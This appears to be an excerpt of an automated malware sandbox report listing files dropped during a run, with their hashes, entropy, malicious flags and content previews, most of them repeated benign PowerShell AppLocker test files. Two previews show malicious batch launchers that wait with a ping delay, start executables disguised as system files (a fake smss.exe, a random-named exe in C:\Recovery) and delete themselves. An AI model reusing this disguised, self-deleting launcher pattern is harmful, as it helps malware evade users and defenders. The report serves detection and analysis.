                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1915
                                                                                      Entropy (8bit):5.363869398054153
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HpHNpaHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1Jtpaq2
                                                                                      MD5:317B013632C78C70B439470DFC84CFE4
                                                                                      SHA1:0AC83F2F5A1025F6AB3E4AB0DABB7A6F4373352B
                                                                                      SHA-256:AD44D0FAB7070B38C2C837DD47621A930B565F561217807E45D5AD57FFE1BF5D
                                                                                      SHA-512:AEC05184A65564407C24BFFB744F0629520AA8B233EAA10581AD501CDC74872A7564473402F74088E29786463785E252E0A9A42123FD63763620884CEE7336AD
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                      Process:C:\Program Files\Windows NT\smss.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1915
                                                                                      Entropy (8bit):5.363869398054153
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HK1HpHNpaHKlT4x:iqbYqGSI6oPtzHeqKkt1wmj0q1Jtpaq2
                                                                                      MD5:317B013632C78C70B439470DFC84CFE4
                                                                                      SHA1:0AC83F2F5A1025F6AB3E4AB0DABB7A6F4373352B
                                                                                      SHA-256:AD44D0FAB7070B38C2C837DD47621A930B565F561217807E45D5AD57FFE1BF5D
                                                                                      SHA-512:AEC05184A65564407C24BFFB744F0629520AA8B233EAA10581AD501CDC74872A7564473402F74088E29786463785E252E0A9A42123FD63763620884CEE7336AD
                                                                                      Malicious:false
                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1510207563435464
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                      MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                      SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                      SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                      SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                      Malicious:false
                                                                                      Preview:@...e................................................@..........
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):25
                                                                                      Entropy (8bit):4.403856189774723
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:563r/RxtbCcJ:Qb/RJ
                                                                                      MD5:8AC0414C8ACB504015031C60509A105A
                                                                                      SHA1:DF740186D008BD87FD87B10E12CD4F29E85E29A0
                                                                                      SHA-256:C47D32073B9B1586435155829BF88BE5637C8A5058133539B92B655074A18F59
                                                                                      SHA-512:0204E104FC5613EDC665F2913C76ADC0F2A52C4BAF5E56461707078520D8545AAAAE6355E20D32DB519215C4A66D55717CB857748BE129CC3C26C1313745CA1C
                                                                                      Malicious:false
                                                                                      Preview:QeI1U3cLzDXZtTHXi1Nw0T92l
                                                                                      Process:C:\portsurrogateFontCrt\BlockcontainerWin.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):163
                                                                                      Entropy (8bit):5.118166158701211
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZjgL8D/PRJIvBktKcKZG1qLTVSRE2J5xAIqxG:hCRLuVFOOr+DEi4/ZmvKOZG1qLTwi23V
                                                                                      MD5:56CBCCAE9958E77FC0C329F1CCA4B531
                                                                                      SHA1:F196C70B26D9ED9F7D9B86E0025C6D42E3979A5B
                                                                                      SHA-256:36DE5CCDAE3B6BC2F76ADC68525665599DB74ECE6C402C386741ADD61D1AC1B3
                                                                                      SHA-512:1D4F54CB6CF9E6270F189B9FDC3FD0689034A8D947F22EF31078BFAE3DBBA09944AB5946DB21AB37154F00F82B534F7798056DB7ABEF890420BB7A410EE6B90B
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows NT\smss.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\DFtfeA2Uey.bat"
                                                                                      Process:C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe
                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):169
                                                                                      Entropy (8bit):5.402518653595053
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7SqEhHg/LVovBktKcKZG1qLTVSRE2J5xAI7R:hCRLuVFOOr+DE7jAAOvKOZG1qLTwi231
                                                                                      MD5:F4FCE0154E78C289FE55B9A6307152A8
                                                                                      SHA1:F8138EA44299193B659827010B847297F5960421
                                                                                      SHA-256:CCFBEE1F11B8330789D52F1D923AE70EDA3A1038F62131BCBF4C99B6D624EBBE
                                                                                      SHA-512:69F8A1313FF882441EEFD37DC5A49D2B73D73AB3643525B908DBA21B486A3996ECAB8ECCC7F5014E32B5D2BBC1A95FE61BAC5B0E2A7BEA9EFAC93E2D0C1E77BE
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                      Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\PdP1UB7pUq.bat"
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
